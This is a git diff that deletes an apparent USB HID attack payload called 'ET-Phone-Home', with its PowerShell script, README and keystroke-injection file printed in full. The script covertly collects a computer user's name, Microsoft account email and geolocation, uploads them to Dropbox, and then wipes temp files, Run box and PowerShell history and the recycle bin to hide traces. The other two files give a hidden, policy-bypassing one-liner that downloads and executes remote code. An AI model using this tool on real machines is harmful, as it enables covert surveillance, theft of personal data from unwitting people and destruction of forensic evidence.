diff --git a/Payloads/Flip-ET-Phone-Home/ET-Phone-Home.ps1 b/Payloads/Flip-ET-Phone-Home/ET-Phone-Home.ps1 deleted file mode 100644 index 9337000..0000000 --- a/Payloads/Flip-ET-Phone-Home/ET-Phone-Home.ps1 +++ /dev/null @@ -1,151 +0,0 @@ - -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : GENERAL | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.SYNOPSIS - This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target - -.DESCRIPTION - This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait. - This script will get the Name and email associated with the targets microsoft account - Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated -#> - -#------------------------------------------------------------------------------------------------------------------------------------ - -$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt" - - #------------------------------------------------------------------------------------------------------------------------------------ - - function Get-fullName { - - try { - - $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name") - - } - - # If no name is detected function will return $env:UserName - - # Write Error is just for troubleshooting - catch {Write-Error "No name was detected" - return $env:UserName - -ErrorAction SilentlyContinue - } - - return $fullName - -} - -$FN = Get-fullName - -#------------------------------------------------------------------------------------------------------------------------------------ - -function Get-email { - - try { - - $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim() - return $email - } - -# If no email is detected function will return backup message for sapi speak - - # Write Error is just for troubleshooting - catch {Write-Error "An email was not found" - return "No Email Detected" - -ErrorAction SilentlyContinue - } -} - -$EM = Get-email - -#------------------------------------------------------------------------------------------------------------------------------------ - -function Get-GeoLocation{ - try { - Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace - $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object - $GeoWatcher.Start() #Begin resolving current locaton - - while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { - Start-Sleep -Milliseconds 100 #Wait for discovery. - } - - if ($GeoWatcher.Permission -eq 'Denied'){ - Write-Error 'Access Denied for Location Information' - } else { - $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. - } - } - # Write Error is just for troubleshooting - catch {Write-Error "No coordinates found" - return "No Coordinates found" - -ErrorAction SilentlyContinue - } - -} - -$GL = Get-GeoLocation - -#------------------------------------------------------------------------------------------------------------------------------------ - -echo $FN >> $env:TMP\$FileName -echo $EM >> $env:TMP\$FileName -echo $GL >> $env:TMP\$FileName - -#------------------------------------------------------------------------------------------------------------------------------------ - -# Upload output file to dropbox - -$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" -$TargetFilePath="/$FileName" -$SourceFilePath="$env:TMP\$FileName" -$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' -$authorization = "Bearer " + $DropBoxAccessToken -$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" -$headers.Add("Authorization", $authorization) -$headers.Add("Dropbox-API-Arg", $arg) -$headers.Add("Content-Type", 'application/octet-stream') -Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to clean up behind you and remove any evidence to prove you were there -#> - -# Delete contents of Temp folder - -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue - -# Delete run box history - -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f - -# Delete powershell history - -Remove-Item (Get-PSreadlineOption).HistorySavePath - -# Deletes contents of recycle bin - -Clear-RecycleBin -Force -ErrorAction SilentlyContinue diff --git a/Payloads/Flip-ET-Phone-Home/README.md b/Payloads/Flip-ET-Phone-Home/README.md deleted file mode 100644 index 6a9be0e..0000000 --- a/Payloads/Flip-ET-Phone-Home/README.md +++ /dev/null @@ -1,120 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# ET Phone Home - -A script I put together to locate your stolen devices, or your "stolen" baited devices - -## Description - -This program is meant to locate your devices. When someone plugs it into their computer a one liner in the run box a script -will be downloaded and executed that grabs the Name and email of the associated microsoft account and the -latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox. -Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin. - -## Getting Started - -### Dependencies - -* DropBox - Your Shared link for the intended file -* Windows 7,10,11 - -

(back to top)

- -### Executing program - -* Your device is plugged into the targets computer -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -``` -powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl -``` -Something Like What you see below will be in your cloud storage: - -NAME - -EMAIL - -LATITUDE AND LONGITUDE - -``` -Jakoby - -jakoby@example.com - - Latitude Longitude - -------- --------- -37.778919 -122.416313 -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -Kalani - - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

I am Jakoby

-


- - - - - - - - - - - - - - - - - - - - Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-ET-Phone-Home) -

- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - - - -

(back to top)

diff --git a/Payloads/Flip-ET-Phone-Home/payload.txt b/Payloads/Flip-ET-Phone-Home/payload.txt deleted file mode 100644 index a41fb71..0000000 --- a/Payloads/Flip-ET-Phone-Home/payload.txt +++ /dev/null @@ -1,21 +0,0 @@ -REM Title: ET-Phone-Home -REM -REM Author: I am Jakoby -REM -REM Target: Windows 10, 11 -REM -REM Description: this script will download and execute your locator script if your wifi access point is not detected -REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in -REM -REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly -REM -REM Replace SSID with name of wifi your computer is connected to -REM -REM -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl -ENTER - -